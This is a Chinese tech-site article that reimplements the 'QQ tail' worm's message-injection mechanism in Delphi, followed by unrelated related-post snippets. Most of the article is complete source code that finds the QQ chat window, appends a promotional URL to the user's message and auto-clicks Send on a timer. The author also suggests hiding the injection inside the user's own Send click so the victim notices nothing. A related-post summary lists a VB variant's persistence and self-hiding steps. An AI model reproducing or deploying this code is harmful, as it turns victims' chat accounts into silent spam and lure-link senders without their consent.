| 近来QQ尾巴病毒大肆发作,我也是经常收到网友们发到来的带尾巴的消息,于是,好奇心一来,我也来研究研究此病毒的发作原理。首先,我不知道QQ尾巴病毒真正的原理,我只是猜测并且自己写了一个类似的程序来实现它。 QQ尾巴的发作情况:当用户打开一个QQ消息发送窗口时,病毒会自动往消息文本框里输入文本,然后不等用户反应过来就发出去了。 程序实现:首先要找到QQ消息发送窗口的句柄以及消息文本框与“发送”按钮的窗口句柄。 一、 如何找到QQ消息发送窗口句柄: QQ消息发送窗口有两种,一种是消息模式,在这种情况下,窗口标题含有“发送消息”字样;一种是聊天模式,窗口标题含有“聊天中”字样; 通过枚举窗口就可找到相应的句柄: // 取得QQ的发送消息窗口 function GetQQWnd: HWND; var hCurrentWindow: HWnd; WndText:String; begin hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST); while hCurrentWindow <> 0 do begin WndText:=GetWndText(hCurrentWindow); if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then dl.bitsCN.com网管软件下载 begin Result:=hCurrentWindow; Exit; end; hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT); end; Result:=0; end; 二、 如何找到“发送”按钮窗口句柄: 找到了QQ的发送消息窗口后,就可以进一步查找“发送”按钮句柄了,如窗口句柄为qqWnd,则可以用一个循环,查找文本中含有“发送”字样的窗口,经过试验发现,“发送”按钮恰恰是窗体的第一个子窗口,这样,可以用 btnWnd:=GetDlgItem(qqWnd,1); // 发送按钮 来获得“发送”按钮的句柄。 三、 如何找到消息文本框窗口句柄: 消息文本框并不好找,不过你可以先在消息文本框中输入几个字母,如“abcd”,这样我们就可以用上述方法来查找了,不过通过实验后,发现消息文本框并不是QQ窗口的直接子窗口,而是其中一个子窗口的子窗口,通过实验,可以用 txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框 来获得。 四、 如何获得原消息文本框的文本: 要获取原消息文本框的文本,只需要一个API函数就行了,如下: // 获得窗口文本
bitsCN_com
function GetWndText(hWnd: HWND): String; Var Ret:LongInt; mText:PChar; Buf:Integer; begin Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1; GetMem(mText,Ret); try Buf:=LongInt(mText); SendMessage(hWnd,WM_GETTEXT,Ret,Buf); Result:=StrPas(mText); finally FreeMem(mText,Ret); end; end; 五、 如何住原消息文本框里追加文本: 与取文本相反 // 发送文本到窗口 procedure SetWndText(hWnd: HWND; Text: String); Var Ret:LongInt; mText:PChar; Buf:Integer; begin GetMem(mText,Length(Text)); StrCopy(mText,PChar(Text)); try Buf:=LongInt(mText); SendMessage(hWnd,WM_SETTEXT,0,Buf); finally FreeMem(mText,Length(Text)); end; end; 六、 如果让“发送”按钮自动点击: 一切都准备好了,现在要开始发送了,为了让消息自动发送,我们可以模拟“发送”按钮被点击了。 feedom.net国内最早的网管网站 SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0); SendMessage(btnWnd,WM_LBUTTONUP,0,0); 通过模拟一个鼠标在“开始”按钮上的按下与放开,就实现了点击发送功能。 七、 其它的定时功能比较简单,在此也不多说了。 八、 全部源代码如下: unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, ExtCtrls; type TForm1 = class(TForm) Timer1: TTimer; Button1: TButton; Edit1: TEdit; Label1: TLabel; Button2: TButton; procedure Timer1Timer(Sender: TObject); procedure Button1Click(Sender: TObject); procedure Button2Click(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} // 获得窗口文本 function GetWndText(hWnd: HWND): String; 需要什么来搜一搜吧so.bitsCN.com Var Ret:LongInt; mText:PChar; Buf:Integer; begin Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1; GetMem(mText,Ret); try Buf:=LongInt(mText); SendMessage(hWnd,WM_GETTEXT,Ret,Buf); Result:=StrPas(mText); finally FreeMem(mText,Ret); end; end; // 发送文本到窗口 procedure SetWndText(hWnd: HWND; Text: String); Var Ret:LongInt; mText:PChar; Buf:Integer; begin GetMem(mText,Length(Text)); StrCopy(mText,PChar(Text)); try Buf:=LongInt(mText); SendMessage(hWnd,WM_SETTEXT,0,Buf); finally FreeMem(mText,Length(Text)); end; end; // 取得QQ的发送消息窗口 function GetQQWnd: HWND; var hCurrentWindow: HWnd; WndText:String; begin hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST); 需要什么来搜一搜吧so.bitsCN.com while hCurrentWindow <> 0 do begin WndText:=GetWndText(hCurrentWindow); if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then begin Result:=hCurrentWindow; Exit; end; hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT); end; Result:=0; end; // 定时处理 procedure TimerProc; var qqWnd,txtWnd,btnWnd:HWND; Msg:String; begin qqWnd:=GetQQWnd; if qqWnd=0 then Exit; btnWnd:=GetDlgItem(qqWnd,1); // 发送按钮 txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框 if (btnWnd=0) or (txtWnd=0) then Exit; Msg:=GetWndText(txtWnd); Msg:=Msg+#13+#10+'欢迎光临绿荫网络http://www.lvyin.net'; SetWndText(txtWnd,Msg); SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0); SendMessage(btnWnd,WM_LBUTTONUP,0,0); end; procedure TForm1.Timer1Timer(Sender: TObject); 需要什么来搜一搜吧so.bitsCN.com begin TimerProc; end; procedure TForm1.Button1Click(Sender: TObject); begin Timer1.Enabled :=not Timer1.Enabled; if Timer1.Enabled then Button1.Caption :='停 止' else Button1.Caption :='开 始'; end; procedure TForm1.Button2Click(Sender: TObject); begin Timer1.Interval :=StrToInt(Edit1.Text); end; end. 总结:上面只讲述了QQ消息自动发送的主要功能,这或许跟QQ尾巴的原理不同(我也不知道),但总体上应该差不多。如果要做到让用户感觉不到异常,就要改一下了,不要自动发送,而是在当用户点击了“发送”按钮后再把文本加进去。这样的话可是拦截“发送”按钮的点击消息,然后再用上述方法把文本加进去,然后把消息交还原程序处理。至于如何让它成为病毒,会自我复制,自我隐藏等功能,那又是另外一个话题了,在此就不多讲了。 | |
| 【文章评论】 【收藏本文】 【推荐好友】 【欢迎投稿】 【打印本文】 | |
| 上一篇:向该死的木马病毒说bye 下一篇:病毒报警 |
相关推荐
QQ尾巴源码
QQ尾巴,可以实现自己发消息。源码+EXE
QQ尾巴病毒的发送原理分析
近来QQ尾巴病毒大肆发作,我也是经常收到网友们发到来的带尾巴的消息,于是,好奇心一来,我也来研究研究此病毒的发作原理。首先,我不知道QQ尾巴病毒真正的原理,我只是猜测并且自己写了一个类似的程序来实现它。 QQ尾巴的发作情况:当用户打开一个QQ消息发送窗口时,病毒会自动往消息文本框里输入文本,然后不等用户反应过来就发出去了。 程序实现:首先要找到QQ消息发送窗口...
VB编写QQ尾巴病毒(超简单版).txt
1.它会使自身在桌面和任务栏上隐藏; 2.在注册表的RUN项建一个子键使之能开机自动运行; 3.复制自己到系统目录下,并隐藏; 4.监视桌面前台窗口,并捕捉QQ聊天窗口;
QQ尾巴病毒
我在网上搜索相应的解决方法,终于找到了,方法如下:1、打开任务管理器进程(按ctrl+shift+esc),结束gedit.exe进程和msscript.exe进程. 2、用查找删除以下文件:c:/windows/system32/gedit.exe和c:/windows/system32/msscript.exe3、打开注册表编辑器(注:方法是开始 运行 输入regedit 回车),找到:
病毒学习之一(转贴)病毒分类 WINDOWS下的PE病毒 病毒名称 Trojan.QQTail.Shejele.a
病毒分类 WINDOWS下的PE病毒 病毒名称 Trojan.QQTail.Shejele.a 别 名 病毒长度 依赖系统 传播途径 行为类型 WINDOWS下的木马程序 感 染 病毒发作 瑞 星 版 本 号 17.19.10 采用VC编写,PECompact加壳,通过QQ,MSN等IM工具传播。 运行后将自
[转帖]详细讲解六大QQ病毒的特征以及清除方法
[转帖]详细讲解六大QQ病毒的特征以及清除方法 一、“QQ尾巴”病毒 病毒主要特征 这种病毒并不是利用QQ本身的漏洞 进行传播。它其实是在某个网站首页上嵌入了一段恶意代码,利用IE的iFrame系统漏洞自动运行恶意木马程序,从而达到侵入用户系统,进而借助QQ进行垃圾信息发送的目的。用户系统如果没安装漏洞补丁或没把IE升级到最高版本,那么访问这些网站的时候其访问的网页中嵌入的恶意代码即被运
“QQ尾巴病毒”核心技术的实现
声明:本文旨在探讨技术,请读者不要使用文章中的方法进行任何破坏。 2003这一年里,QQ尾巴病毒可以算是风光了一阵子。它利用IE的邮件头漏洞在QQ上疯狂传播。中毒者在给别人发信息时,病毒会自动在信息文本的后边添上一句话,话的内容多种多样,总之就是希望信息的接收者点击这句话中的URL,成为下一个中毒者。下图就是染毒后的QQ发送的消息,其中中毒者只打了“你好”两个字,其它的就全是病毒的杰作了。
list中对象、值保存的解释
[code="java"] package com.lee.list; import java.util.ArrayList; import java.util.List; import org.junit.Test; import com.lee.model.Person; public class ListAddChangeList { /*[com.l...
List中改变一个对象的值,其他的List值也跟着改变
List中改变一个对象的值,其他的List值也跟着改变 BeanUtils.clonebean()克隆对象 List的clone()方法 浅拷贝深拷贝
cookie保存对象、使用ObjectMapper实现json和list集合相互转换
在项目中需要用到cookie做缓存,记录用户的观看记录,每条记录为实体的一个对象,想到了不同的方法: 方法一:直接保存每个对象的数据,每个cookie的name对应一个对象的json,有多条记录就需要记录多个cookie。但是这个方法有很大的弊端,观看记录比较多,那么就需要创建太多的cookie,一方面在统计有多少条记录时需要在获取cookie的name之后再对name进行分割判断是不是观看记录,...
Java List集合的坑(add方法报空指针,循环赋值时list已保存的值会改变)
先看空指针异常: List<MovieInfo> movieInfos= null; 这样创建时,list指向为空,修改方法: List<MovieInfo> movieInfos= new ArrayList<MovieInfo>(); 再看list循环赋值的问题: 问题描述: for (i=0;i<10;i++){ ...
Struts2——将字符串、对象、list集合保存到值栈中,在jsp页面中获取的方法
封装对象User,属性有id,username,email等 1.1:在action中将字符串保存到值栈中 1.1.1 获取值栈对象 ValueStack stack = ActionContext.getContext().getValueStack(); 1.1.2 将字符串保存到值栈中stack.set("username","leo");1.2:在jsp页面中获取值栈中的字符串
lxw_QQAutoSendMsg
lxw_QQAutoSend private bool SendQQMsg(IntPtr hWnd, string sendText, out string error) { error = ""; try { WinAPI.ShowWindow(hWnd, WinAPI.ShowWindowCommands.Normal); WinAPI.BringWindowToTop(hWnd);
修改List内部对象的属性值并保存
直接通过List.get(i)获取对象obj,并对obj中的属性进行修改即可。因为obj获取的是List中对象的引用,所以对obj的修改会自动同步到对List中去 public class ListTest { public static void main(String args[]) { User user1=new User(); ...
记录List赋值到新List时,对象值改变,新List内值也改变处理方法
问题产生 在项目开发中,有一次的业务需求是需要对订单列表中信息进行处理,同时保留原订单信息列表,简单直接上手撸,在对原订单List<Order>中值进行操作时,最后发现复制出来的List内的对象值也同时改变。第一次写的代码如下 Map<String,Object> resMap = new HashMap<>(); List<Order>...
Android -- SharedPreferences保存基本数据、序列化对象、List数据
前言 Android提供了五种数据存储方式: 使用 SharedPreferences 存储数据 文件存储数据 SQLite 数据库存储方式 使用 ContentProvider 存储数据 网络存储数据 在 Android 下做持久化的数据存储,大部分是用 sqlite 数据库或 sharepreference。为了少写 sql 语句,大部分都是用 ORM 形式的开源数据库框架,例如 gree...
List 中存储的对象数据,都是最后存入的值
问题: List<People> peopleList = new ArrayList(); People people = new People(); for(int i = 0 ; i < 10 ; i++){ people.setId("id" + i); people.setAge("age" + i); peopleList.add(people); } //输出结果都是 //id10 //age10 sout(peopleList); 问题的产生在于
对象的本地保存
序列化:序列化是将对象状态转换为可保持或传输的格式的过程,比如转化为二进制、xml、json等的过程。反序列化:与序列化相对的是反序列化,它将流转换为对象,也就是将在序列化过程中所生成的二进制串、xml、json等转换成数据结构或者对象的过程XML 是 eXtensible Markup Language 的缩写, 即可扩展标记语言。它是一种可以用来创建自定义的标记语言,由万维网协会(W3C)创建,用来克服HTML的局限。从使用功能上看, XML 主要用于数据的存储,而 HTML 主要用于数据显示。
327




被折叠的 条评论
为什么被折叠?



